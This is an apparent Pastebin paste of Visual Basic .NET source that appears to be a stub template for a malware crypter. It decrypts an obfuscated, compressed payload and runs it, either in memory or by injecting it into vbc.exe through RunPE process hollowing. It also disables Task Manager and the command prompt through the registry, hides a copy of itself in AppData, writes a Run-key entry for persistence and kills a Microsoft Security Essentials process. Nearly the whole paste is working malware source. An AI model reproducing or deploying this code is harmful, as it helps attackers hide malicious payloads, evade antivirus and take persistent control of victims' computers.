Advertisement
Guest User

Untitled

a guest
Jun 27th, 2017
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.36 KB | None | 0 0
  1. Imports System.Windows
  2. Imports System
  3. Imports System.Net
  4. Imports System.IO
  5. Imports System.Text
  6. Imports System.Reflection
  7. Imports System.Windows.Forms
  8. Imports System.IO.FileStream
  9. Imports Microsoft.VisualBasic
  10. Imports System.Runtime.InteropServices
  11. Imports System.ComponentModel
  12. Imports Microsoft.Win32
  13. Imports System.Diagnostics
  14. Imports System.Runtime.CompilerServices
  15. Imports System.Object
  16. #VersionInfo#
  17. #fakejunk1#
  18. Module %1%
  19. Dim %2% As String = %3%
  20. Dim c As New PolyXorbyMiharbiDono("EncryptionKEY")
  21. Dim %4% As Byte() = c.PolyDeCrypt(DeCompress(Convert.FromBase64String(%2%)))
  22. Dim %5% As String = "%6%" & ".exe"
  23. Dim Auto As String = "%88%"
  24. Dim DotNet As String = "%999%"
  25. Dim startup As String="%90%"
  26. Dim AntiT As String = "ThisnThat"
  27. Dim AntiTaskss As String="antitask"
  28. Dim Dna As String="disablecmd"
  29. Dim AntiSystems As String="antisystem"
  30. Dim antimals As String="antimal"
  31. Dim microSs As String="microS"
  32. Dim vbc As String=Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
  33.  
  34. Public Function DeCompress(ByVal input() As Byte) As Byte()
  35. Dim m As New IO.MemoryStream(input)
  36. Dim c As New IO.Compression.DeflateStream(m, IO.Compression.CompressionMode.Decompress)
  37. Dim Buffer() As Byte
  38. Dim Offset As Integer = 0
  39. Dim Count As Integer = 0
  40. While True
  41. ReDim Preserve Buffer(Count + 100)
  42. Dim Bytes As Integer = c.Read(Buffer, Offset, 100)
  43. If Bytes = 0 Then Exit While
  44. Offset += Bytes
  45. Count += Bytes
  46. End While
  47. ReDim Preserve Buffer(Count - 1)
  48. Return Buffer
  49. End Function
  50.  
  51. Sub Main()
  52. '------------------------------------------------------------------------------------------------------------------
  53. '------------------------------------------------------------------------------------------------------------------
  54. '------------------------------------------------------------------------------------------------------------------
  55. '------------------------------------------------------------------------------------------------------------------
  56. if Dna="T" then
  57. Try
  58. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "1", Microsoft.Win32.RegistryValueKind.DWord)
  59. Catch ex As Exception
  60. End Try
  61. End if
  62. '------------------------------------------------------------------------------------------------------------------
  63. '------------------------------------------------------------------------------------------------------------------
  64. if AntiTaskss="T" then
  65. Try
  66. Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide)
  67. Catch ex As Exception
  68. End Try
  69. End if
  70.  
  71. '------------------------------------------------------------------------------------------------------------------
  72. '------------------------------------------------------------------------------------------------------------------
  73. If startup = "T" Then
  74. Try
  75. IO.File.Copy(System.Windows.Forms.Application.ExecutablePath, _
  76. System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
  77. & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
  78. IO.File.SetAttributes(System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
  79. & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath), IO.FileAttributes.Hidden)
  80. My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
  81. True).SetValue("1" & System.Windows.Forms.Application.ProductName, _
  82. System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
  83. & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
  84. addtostartup_Adminreq("%111%", Application.ExecutablePath)
  85. Catch ex As Exception
  86. End Try
  87. End if
  88. '------------------------------------------------------------------------------------------------------------------
  89. '------------------------------------------------------------------------------------------------------------------
  90. If DotNet = "T" Then
  91. Dim thr1 As New Threading.ThreadStart(AddressOf Exe)
  92. thr1.Invoke()
  93. Else: End If
  94. '------------------------------------------------------------------------------------------------------------------
  95. '------------------------------------------------------------------------------------------------------------------
  96. If antimals = "T" Then
  97. Try
  98. AntiMalwarebytes()
  99. Catch ex As Exception
  100. End Try
  101. End if
  102. '------------------------------------------------------------------------------------------------------------------
  103. '------------------------------------------------------------------------------------------------------------------
  104. If Auto = "T" Then
  105. Try
  106. Assembly.Load(%4%)
  107. Dim thr As New Threading.ThreadStart(AddressOf RunExe)
  108. thr.Invoke()
  109. Catch e As Exception
  110. if os.is64Bit()=True Then
  111. RunPE.Inject(%4%,vbc)
  112. Else
  113. RunPE.Inject(%4%,vbc)
  114. End If
  115. End Try
  116. Else: End If
  117. End
  118. End Sub
  119. '------------------------------------------------------------------------------------------------------------------
  120. '------------------------------------------------------------------------------------------------------------------
  121. Public Sub addtostartup_Adminreq(ByVal Name As String, ByVal Path As String)
  122. Try
  123. Dim Registry As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
  124. Dim Key As Microsoft.Win32.RegistryKey = Registry.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
  125. Key.SetValue(Name, Path, Microsoft.Win32.RegistryValueKind.String)
  126. Catch ex As Exception
  127. End Try
  128. End Sub
  129. '------------------------------------------------------------------------------------------------------------------
  130. '------------------------------------------------------------------------------------------------------------------
  131. Function AntiMalwarebytes()
  132. Dim malwarebytes As Process() = Process.GetProcesses
  133. Dim i As Integer
  134. For i = 0 To malwarebytes.Length - 1
  135. Select Case Strings.LCase(malwarebytes(i).ProcessName)
  136. Case "Msseces"
  137. malwarebytes(i).Kill()
  138. Case Else
  139. End Select
  140. Next
  141. End Function
  142. '------------------------------------------------------------------------------------------------------------------
  143. '------------------------------------------------------------------------------------------------------------------
  144. Public Sub RunExe()
  145. Dim Resource As String = String.Empty
  146. Dim ResourcesBuffer As Byte() = %4%
  147. Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
  148. Dim entryPoint As MethodInfo = [assembly].EntryPoint
  149. Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
  150. entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
  151. End Sub
  152. Public Sub Exe()
  153. Dim Resource As String = String.Empty
  154. Dim ResourcesBuffer As Byte() = %4%
  155. Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
  156. Dim entryPoint As MethodInfo = [assembly].EntryPoint
  157. Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
  158. entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"2"}})
  159. End Sub
  160. '------------------------------------------------------------------------------------------------------------------
  161. '------------------------------------------------------------------------------------------------------------------
  162. public Class os
  163. 'this will check for 64 bit and 32 bit ops
  164. Public Shared Function is64Bit() As Boolean
  165. If Not System.Environment.GetEnvironmentVariable("ProgramW6432") = "" Then
  166. Return True
  167. Else
  168. Return False
  169. End If
  170. End Function
  171. End Class
  172. '------------------------------------------------------------------------------------------------------------------
  173. '------------------------------------------------------------------------------------------------------------------
  174. Public Class RunPE
  175. Public Const PAGE_NOCACHE As Long = &H200
  176. Public Const PAGE_EXECUTE_READWRITE As Long = &H40
  177. Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
  178. Public Const PAGE_EXECUTE_READ As Long = &H20
  179. Public Const PAGE_EXECUTE As Long = &H10
  180. Public Const PAGE_WRITECOPY As Long = &H8
  181. Public Const PAGE_NOACCESS As Long = &H1
  182. Public Const PAGE_READWRITE As Long = &H4
  183. Public Const PAGE_READONLY As UInt32 = &H2
  184.  
  185. Public Shared Sub Inject(ByVal data() As Byte, ByVal target As String)
  186. Dim C = New Context, SH As Section_Header, PI = New Process_Information, SI = New Startup_Information, PS = New Security_Flags, TS = New Security_Flags
  187. Dim GC = GCHandle.Alloc(data, GCHandleType.Pinned)
  188. Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
  189. Dim DH As New DOS_Header
  190. DH = Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
  191. GC.Free()
  192. Dim CP As CP = CreateAPI(Of CP)("kernel32", "CreateProcessA")
  193. Dim GTC As GTC = CreateAPI(Of GTC)("kernel32", "GetThreadContext")
  194. Dim RPM As RPM = CreateAPI(Of RPM)("kernel32", "ReadProcessMemory")
  195. Dim WPM As WPM = CreateAPI(Of WPM)("kernel32", "WriteProcessMemory")
  196. Dim UVS As UVS = CreateAPI(Of UVS)("ntdll", "ZwUnmapViewOfSection")
  197. Dim VA As VA = CreateAPI(Of VA)("kernel32", "VirtualAllocEx")
  198. Dim STC As STC = CreateAPI(Of STC)("kernel32", "SetThreadContext")
  199. Dim RT As RT = CreateAPI(Of RT)("kernel32", "ResumeThread")
  200. If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
  201. Dim NH As New NT_Headers
  202. NH = Marshal.PtrToStructure(New IntPtr(Buffer + DH.Address), NH.GetType)
  203. Dim Address, Offset As Long, ret As UInteger
  204. SI.CB = Len(SI)
  205. C.Flags = 65539
  206. If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return
  207. If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
  208. GTC(PI.Thread, C)
  209. RPM(PI.Process, C.Ebx + 8, Address, 4, 0)
  210. UVS(PI.Process, Address)
  211. Dim ImageBase As UInt32 = VA(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
  212. If ImageBase <> 0 Then
  213. WPM(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
  214. Offset = DH.Address + 248
  215. For I As Integer = 0 To NH.File.Sections - 1
  216. SH = Marshal.PtrToStructure(New IntPtr(Buffer + Offset + I * 40), SH.GetType)
  217. Dim Raw(SH.Size) As Byte
  218. For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
  219. WPM(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
  220. Next I
  221. Dim T = BitConverter.GetBytes(ImageBase)
  222. WPM(PI.Process, C.Ebx + 8, T, 4, ret)
  223. C.Eax = ImageBase + NH.Optional.Address
  224. STC(PI.Thread, C)
  225. RT(PI.Thread)
  226. End If
  227. End Sub
  228. Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
  229. Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
  230. Private Shared Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
  231. Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
  232. End Function
  233. <StructLayout(0)> Structure Context
  234. Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
  235. Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
  236. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
  237. End Structure
  238. <StructLayout(0)> Structure Save
  239. Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
  240. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
  241. Dim State As UInt32
  242. End Structure
  243. Structure Misc
  244. Dim Address, Size As UInt32
  245. End Structure
  246. Structure Section_Header
  247. Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
  248. End Structure
  249. Structure Process_Information
  250. Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
  251. End Structure
  252. <StructLayout(0, CharSet:=3)> Structure Startup_Information
  253. Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
  254. Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
  255. End Structure
  256. <StructLayout(0)> Structure Security_Flags
  257. Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
  258. End Structure
  259. <StructLayout(0)> Structure DOS_Header
  260. Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
  261. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
  262. Dim ID, Info As UInt16
  263. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
  264. Dim Address As Int32
  265. End Structure
  266. Structure NT_Headers
  267. Dim Signature As UInt32, File As File_Header, [Optional] As Optional_Headers
  268. End Structure
  269. <StructLayout(0)> Structure File_Header
  270. Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
  271. End Structure
  272. <StructLayout(0)> Structure Optional_Headers
  273. Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
  274. Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
  275. Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
  276. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory()
  277. End Structure
  278. <StructLayout(0)> Structure Data_Directory
  279. Dim Address, Size As UInt32
  280. End Structure
  281. Delegate Function CP(ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As Startup_Information, <Out()> ByRef info As Process_Information) As Boolean
  282. Delegate Function WPM(ByVal process As IntPtr, ByVal address As Integer, ByVal buffer As Byte(), ByVal size As Integer, <Out()> ByRef written As Integer) As Boolean
  283. Delegate Function RPM(ByVal process As IntPtr, ByVal address As Integer, ByRef buffer As Integer, ByVal size As Integer, ByRef read As Integer) As Integer
  284. Delegate Function VA(ByVal process As IntPtr, ByVal address As Integer, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
  285. Delegate Function UVS(ByVal process As IntPtr, ByVal address As Integer) As Long
  286. Delegate Function RT(ByVal thread As IntPtr) As UInt32
  287. Delegate Function GTC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
  288. Delegate Function STC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
  289. End Class
  290. '------------------------------------------------------------------------------------------------------------------
  291. '------------------------------------------------------------------------------------------------------------------
  292. Public Class PolyXorbyMiharbiDono
  293. Public Function PolyDeCrypt(ByVal Data() As Byte) As Byte()
  294. 'This Function is the exact reverse of the crypt function.
  295. 'we should Decrypt to get our last randomized data.
  296. Data = XorCrypt(Data, Encoding.Default.GetBytes(Key))
  297. Dim i As Integer
  298. 'Now in the other function the return value is a one byte bigger array. lets remove that one
  299. Dim ReturnBuffer(Data.Length - 2) As Byte
  300. 'we started from Byte n# 0 to the last one. we'll play it reversed now.
  301. For i = Data.Length - 1 To 1 Step -1
  302. 'We just remove The previous byte value from the current one Mod 256. simple
  303. ReturnBuffer(i - 1) = ModuloByte(Data(i), -Data(i - 1))
  304. Next
  305. 'That's it. The Buffer is one byte less then the data. Perfect. Return it.
  306. Return ReturnBuffer
  307. End Function
  308. 'A Positive Mod 256. This will prevent a non byte value. the result is always >= 0 and <= 255
  309. Private Function ModuloByte(ByVal MyByte As Byte, ByVal Addition As Int16) As Byte
  310. While Addition < 0
  311. Addition += 256
  312. End While
  313. Return Convert.ToByte((MyByte + Addition) Mod 256)
  314. End Function
  315. Private Function XorCrypt(ByVal Data() As Byte, ByVal Key() As Byte) As Byte()
  316. If Key.Length <> 0 Then
  317. Dim i As Integer
  318. For i = 0 To Data.Length - 1
  319. Data(i) = Data(i) Xor ModuloByte(Key(i Mod Key.Length), [Key](Key(i Mod Key.Length) Mod Key.Length)) Xor [Key](((i + (i Mod 7)) Mod Key.Length) Mod Key.Length)
  320. Next
  321. End If
  322. Return Data
  323. End Function
  324. Private sKey As String = ""
  325. 'Property, will Give us acces to the key.
  326. Public Property Key() As String
  327. Get
  328. Return sKey
  329. End Get
  330. Set(ByVal value As String)
  331. sKey = value
  332. End Set
  333. End Property
  334. 'Inisalization. (New Constructor)
  335. Public Sub New(ByVal Key As String)
  336. Me.Key = Key
  337. End Sub
  338. Public Sub New()
  339. Me.Key = ""
  340. End Sub
  341. End Class
  342. '------------------------------------------------------------------------------------------------------------------
  343. '------------------------------------------------------------------------------------------------------------------
  344. End Module
  345. #fakejunk2#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement